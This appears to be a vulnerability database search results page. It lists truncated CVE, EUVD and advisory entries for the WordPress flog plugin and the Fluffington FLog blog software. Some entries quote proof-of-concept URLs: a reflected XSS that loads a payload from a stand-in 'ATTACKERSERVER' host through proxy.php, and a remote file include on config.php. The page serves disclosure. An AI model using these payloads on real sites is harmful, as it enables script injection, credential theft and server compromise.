18 matches found
CVE-2014-4530
flog plugin 0.1 for WordPress has XSS...
EUVD-2006-0359
Malware in sbrugna...
EUVD-2014-4457
Malware in sbrugna...
WordPress flog cross-site scripting vulnerability
WordPress is a set of blogging platforms developed using the PHP language by the WordPress Foundation. The platform supports setting up personal blog sites on servers with PHP and MySQL. A cross-site scripting vulnerability exists in WordPress flog version 0.1. The vulnerability stems from a lack...
Cross site scripting
flog plugin 0.1 for WordPress has XSS...
CVE-2014-4530
CVE-2014-4530 concerns the WordPress flog plugin (version 0.1). The vulnerability is a cross-site scripting (XSS) issue arising from insufficient input validation in the flog plugin, leading to unauthenticated, reflected XSS. Multiple connected sources (Red Hat, CNVD, NVD, CVE lists, and WP explo...
Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...
Flog <= 0.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
The last time it was checked the plugin was still affected and had been closed. PoC https://www.example.com/wp-content/plugins/flog/silex-plugin-themes/flash-theme/silexserver/cgi/scripts/proxy.php?url=ATTACKERSERVER/test.html With the payload in the test.html file controlled by the attackers...
flog112-disclose.txt
-=--------------------ADVISORY-------------------=- FLog 1.1.2 Author: CorryL [email protected] -=-----------------------------------------------=- -=+ Application: FLog -=+ Version: 1.1.2 -=+ Vendor's URL: http://www.fluffington.com/index.php?page=flog -=+ Platform: Windows\Linux\Unix -=+ Bug...
Flog 1.1.2 Remote Admin Password Disclosure
-=--------------------ADVISORY-------------------=- FLog 1.1.2 Author: CorryL [email protected] -=-----------------------------------------------=- -=+ Application: FLog -=+ Version: 1.1.2 -=+ Vendor's URL: http://www.fluffington.com/index.php?page=flog -=+ Platform: Windows\Linux\Unix -=+ Bug typ...
Flog.txt
SaVSaK.CoM | SpC-x - The-BeKiR | Flog 1.1.2 Version - Remote File Include Vulnerabilities Risk : High Class: Remote Script : Flog Credits : SpC-x Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke Code : Vulnerable : http://www.victim.com/Flog/config.php?FLogdirinclude=Command-Sh...
Flog 1.1.2 Version - Remote File Include Vulnerabilities
SaVSaK.CoM | SpC-x - The-BeKiR | Flog 1.1.2 Version - Remote File Include Vulnerabilities Risk : High Class: Remote Script : Flog Credits : SpC-x Thanks : The-BeKiR - Ejder - FasTBoY - ERNE - RMx - Nukedx - Str0ke Code : <?php $FLogdirplugins = 'plugins/'; $FLogdirdata = 'data/'; $FLogdirthemes =...
CVE-2006-0352
The default configuration of Fluffington FLog 1.01 installs users.0.dat under the web document root with insufficient access control, which might allow remote attackers to obtain sensitive information (login credentials) via a direct request. NOTE: It was later reported that 1.1.2 is also affected...
CVE-2006-0352
The CVE-2006-0352 entry concerns Fluffington FLog 1.01 (also noted for 1.1.2) where the default configuration places users.0.dat under the web document root with insufficient access control, potentially allowing remote retrieval of sensitive information (login credentials) via a direct request. C...
[eVuln] Flog Information Disclosure Vulnerability
New eVuln Advisory: Flog Information Disclosure Vulnerability http://evuln.com/vulns/38/summary/bt/ --------------------Summary---------------- Software: Flog Software's Web Site: http://www.fluffington.com Versions: 1.0.1 Critical Level: Harmless Type: Information Disclosure Class: Remote Status...